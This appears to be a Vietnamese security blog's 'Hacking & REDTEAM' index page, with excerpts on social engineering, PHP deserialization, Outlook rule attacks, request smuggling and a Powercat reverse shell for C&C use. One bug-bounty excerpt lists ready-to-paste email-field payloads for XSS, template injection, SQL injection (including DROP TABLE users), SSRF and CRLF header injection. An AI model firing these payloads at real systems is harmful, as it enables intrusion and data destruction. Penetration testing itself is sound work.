Hacking & REDTEAM

Tấn công Social Engineering toàn tập [part 2]

Phân loại Social Engineering Social Engineering có thể được chia thành hai loại phổ biến: Human-Based Social Engineering Human-based là kỹ thuật Social Engineering liên quan đến sự tương tác giữa con người với con người để thu được thông tin mong muốn. Ví dụ như chúng ta phải gọi điện thoại đến phòng Help…

Đọc tiếp

Tấn công Social Engineering toàn tập [part 1]

Giới thiệu Trên thế giới, khi nói về vấn đề bảo mật thông tin, người ta không thể không nói đến Social Engineering – một kỹ thuật khai thác thông tin rất nguy hiểm, khó phát hiện, phòng chống và gây thiệt hại to lớn cho công tác bảo mật thông tin. Ngày nay, công…

Đọc tiếp

PHP Object Injection a.k.a PHP Insecure Deserialization

Ở PHP lổ hổng deserialization còn được gọi là PHP object injection. Để có thể hiểu về vấn đề này, trước tiên ta phải biết PHP serialize và deserialize một đối tượng như thế nào.PHP có 2 hàm là serialize() và unserialize() đảm nhận 2 nhiệm vụ này. Ví dụ serialize object User: Kết quả…

Đọc tiếp

[Bug Bounty]Một số payload khi test trường email

Chép lại cho các ông copy nhé, nhất các ông :v XSStest+(alert(0))@example.comtest@example(alert(0)).com”alert(0)”@example.comTemplate injection”<%=7*7%>”@example.comtest+(${{7*7}})@example.comSQLi”‘OR1=1–‘”@example.com”mail’);DROP TABLE users;–“@example.comSSRFjohn.doe@abc123.burpcollaborator.netjohn.doe@[127.0.0.1]Parameter pollutionvictim&email=attacker@example.com(Email) Header injection”%0d%0aContent-Length:%200%0d%0a%0d%0a”@example.com”recicpient@test.com>\r\nRCPT TO:<victim+”@test.com

Đọc tiếp

Reverseshell-Powercat-v2

Con hàng backconnect cơ bản, dùng khá okela, khá mượt. Link download: Muốn biến powershell thành exe thì dùng: Lưu ý: máy chủ C&C phải mở hai port.

Đọc tiếp

Outlook Form/Rule attack cheat sheet

Bài viết ngắn gọn cho tấn công Outlook form/rule attack, cách sử dụng công cụ ruler. Nguyên lý của tấn công này là tất cả các rule, custom form đều sẽ được đồng bộ nên có thể đăng nhập ở bất kỳ máy nào để thiết lập script độc hại. Đọc thêm: Công cụ Link…

Đọc tiếp

HTTP Request Smuggling toàn tập

I. HTTP request smuggling là gì? HTTP Request Smuggling là một kỹ thuật khai thác sự bất đồng bộ xử lý gói tin HTTP giữa máy chủ proxy/balancer/… với máy chủ web/backend. Lỗ hổng này thường gây ra các ảnh hưởng rất nghiệp trọng tới logic web thông thường. OK chúng ta sẽ cùng tìm…

Đọc tiếp

Loading…

Something went wrong. Please refresh the page and/or try again.

%d bloggers like this: